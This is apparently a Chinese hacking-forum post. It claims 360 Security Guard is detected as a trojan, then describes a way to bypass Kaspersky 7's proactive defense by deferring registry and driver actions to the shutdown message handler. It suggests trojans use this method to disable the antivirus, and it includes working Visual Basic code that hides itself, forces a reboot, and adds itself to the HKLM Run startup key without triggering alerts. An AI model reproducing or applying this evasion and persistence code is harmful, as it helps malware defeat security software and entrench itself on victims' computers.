用360安全卫士的思路 突破卡巴斯基主动防御新法
最近卡巴斯基、CA、F-Secure 、趋势,AVG,多个知名杀毒软件检测出360含有木马。我们把最新版的360 4.1.0.1006 特征上传到第三方木马测试网站,检测结果如下:
http://www.virustotal.com/zh-cn/analisis/a2b92d4b6814983d5cb1102f760661f7
果然还是报木马啊,这么多查毒软件难道都是误报,也太巧合了吧!
360官方自己不给解释,那就自己动手分析分析吧。一分析是一大堆问题啊,其中涉及一些敏感的问题,这里就不多说了有能力的人自己逆着看看吧。另外有一个意外收获,意外发现了一个突破主动防御的思路,在这里分享出来。
突破主动防御是要在完全不触发主动防御的情况下实现诸如注册表读写、文件操作等.我们先看看这个思路的发现过程, 打开360安全卫士的某一项保护功能如U盘病毒免疫,然后向托盘上的360tray.exe发送关闭消息.我们看到一个提示窗口
这个画面相信很多普通用户也看过,不过这个跟突破主动防御会有什么联系啊。嘿嘿,各位别急。让我们来捋一下这个过程。
上面的提示信息其实是在关闭360时触发的,
我们模拟360的这个过程,写一个程序让程序在响应WM_Close、WM_QueryEndSession等消息时写注册表Run值,也就是说在关闭程序的时候程序写注册表。我们现在关机,一般用户不会手工关掉托盘上的程序再点关机吧。所以我们开着程序就直接点关机会看看效果,你猜怎么着?我们在卡巴斯基 7 的主动防御保护下成功写了注册表启动项!
根据360的这个思路,可以设计这样一个程序。木马在第一次运行的时候不要做任何触发主动防御的动作,把这些动作都写在响应WM_Close消息的模块中,然后执行关机,在关机过程中这些触发主动防御的动作都不会被拦截。
比如利用关机过程安装恢复SSDT 的驱动,重启后可以完全干掉卡巴主动防御功能。
思路就讲这么多。只是让大家对360含木马这个事有更高层次的反思,我多不讲了。我想安全问题还是交给正规杀毒软件厂商来做比较靠谱。
附VB利用代码,下面程序的功能是在不触发卡巴主动防御报警的情况下把自身写到注册表启动中。
Private Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const REG_SZ = 1
Private Sub Form_Load()
Me.Visible = False
ExitWindowsEx EWX_FORCE, 0 '重启计算机
End Sub
Private Sub Form_Unload(Cancel As Integer)
'关机响应,把自身写到注册表Run中
Dim Ret2 As Long
RegCreateKey HKEY_LOCAL_MACHINE, "software\microsoft\windows\currentVersion\run", Ret2
RegSetValue Ret2, vbNullString, REG_SZ, App.Path + "\" + App.EXEName + ".exe", 4
RegCloseKey Ret2
End Sub
效果不错,嘿嘿
[用户系统信息]Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5))
